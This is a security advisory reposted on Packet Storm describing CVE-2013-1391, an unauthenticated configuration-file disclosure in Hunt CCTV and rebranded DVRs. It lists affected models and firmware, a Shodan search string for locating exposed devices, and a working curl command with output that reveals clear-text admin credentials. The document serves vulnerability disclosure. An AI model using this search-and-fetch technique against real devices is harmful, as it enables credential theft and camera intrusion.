exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hunt CCTV Credential Disclosure

Hunt CCTV Credential Disclosure
Posted Jan 28, 2013
Authored by Alejandro Ramos

Hunt CCTV and generic brands suffer from a file disclosure vulnerability that discloses authentication information.

tags | exploit, info disclosure
advisories | CVE-2013-1391
SHA-256 | 14b74ae440b4a6e07d0a98ee13f99a611c71523e6ac3e975712c53334e4ca50b

Hunt CCTV Credential Disclosure

Change Mirror Download
Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos <aramosf @ gmail . com>

-- CVE ID:
CVE-2013-1391 [reserved]

-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)

-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)

Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%

-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.

Example:

[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
* Trying x.x.x.x... connected
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy

Vulnerable firmware (127 different ones):
- 1.1.10 to 1.1.92
- 1.47 to 1.51
- 2.0.0 to 2.1.93
- 3.0.04 to 3.1.92

-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html

--
Alejandro Ramos
www.securitybydefault.com
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close